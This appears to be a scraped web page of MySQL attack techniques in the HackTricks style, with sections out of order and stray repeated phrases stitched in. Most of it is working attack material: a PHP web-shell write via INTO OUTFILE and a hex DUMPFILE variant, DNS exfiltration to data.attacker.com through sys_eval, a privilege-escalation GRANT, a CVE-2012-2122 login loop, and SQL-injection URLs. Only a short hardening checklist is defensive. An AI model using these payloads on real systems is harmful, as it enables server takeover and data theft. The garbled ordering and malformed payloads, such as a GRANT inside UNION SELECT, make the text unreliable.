Mysql Hacktricks Verified File

MySQL HackTricks Verified: A Practical Analysis of Attack Vectors and Defensive Validation

2.3 Writing a Web Shell

If you have FILE and know the web root, you can write a webshell (provided secure_file_priv is not set to a restricted directory).

Example:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

HackTricks Verified Bypass:
If OUTFILE fails due to newline issues, use INTO DUMPFILE with hex:

SELECT unhex('3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e') INTO DUMPFILE '/var/www/html/shell2.php';

Part 8: The "Verified" Red Flags – When a Technique Fails

Not every HackTricks command works everywhere. Here is the reality check: mysql hacktricks verified

| Technique | Failure Reason | Verified Alternative | | :--- | :--- | :--- | | INTO OUTFILE | secure_file_priv is set | Use INTO DUMPFILE in plugin dir | | LOAD_FILE() | File size > max_allowed_packet | Use LOAD DATA LOCAL INFILE | | UDF Shell | plugin_dir not writable | Try writing to tmp and restarting MySQL (rare) | | OOB DNS | Linux doesn't support UNC | Use sys_eval('nslookup data.attacker.com') |

6. PrivEscalation

• Payload: GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password';
• Description: This payload is used to escalate privileges.

Example:

http://example.com/vulnerable-page?id=1 UNION SELECT GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password' -- -

8. MySQL Authentication Bypass (CVE-2012-2122)

Affected versions: MySQL 5.0.x – 5.1.63, 5.5.x – 5.5.24, 5.6.x – 5.6.6
Exploit: When memcmp() returns 0, authentication succeeds even with wrong password.
Exploit script (bash): MySQL HackTricks Verified: A Practical Analysis of Attack

for i in `seq 1 1000`; do mysql -u root -pwrong -h target.com -e "select 1" 2>&1; done

~1 in 256 chance of success.

Part 1: Enumeration – The "Verified" Scan

Before exploiting, you must enumerate. Nmap is the standard bearer.

Verified Command:

nmap -sV -sC -p 3306 <target-ip> --script mysql*

What to look for:

• Protocol version (10 is common, 4 is old and vulnerable).
• Authentication plugin (caching_sha2_password vs. mysql_native_password).
• Anonymous access (Try: mysql -h <target> -u anonymous).

Pro Tip: Use Metasploit’s auxiliary scanner for speed.

use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_login

Hardening checklist (actionable)

• Network: block 3306 from public internet; use bastion or VPN.
• Auth: strong passwords, SCRAM, MFA for admin consoles.
• Privileges: least privilege, remove FILE and SUPER from app users.
• Config: disable local_infile, secure plugin_dir, set secure_file_priv to restricted path.
• Patching: upgrade to supported MySQL/MariaDB versions; monitor CVEs.
• Backup: encrypt at rest, restrict access, rotate keys.
• Auditing: enable MySQL audit plugin, log DDL/DML and admin commands.

9. MySQL Command Execution via system (MySQL client only)

If you have MySQL command line client access: HackTricks Verified Bypass: If OUTFILE fails due to

system ls -la
\! whoami

Not a remote vulnerability – only works from interactive client session.

1. Union-Based SQL Injection

• Payload: UNION SELECT NULL,NULL,NULL -- -
• Description: This payload is used to extract data from the database by injecting malicious SQL code.

Example:

http://example.com/vulnerable-page?id=1 UNION SELECT NULL,NULL,NULL -- -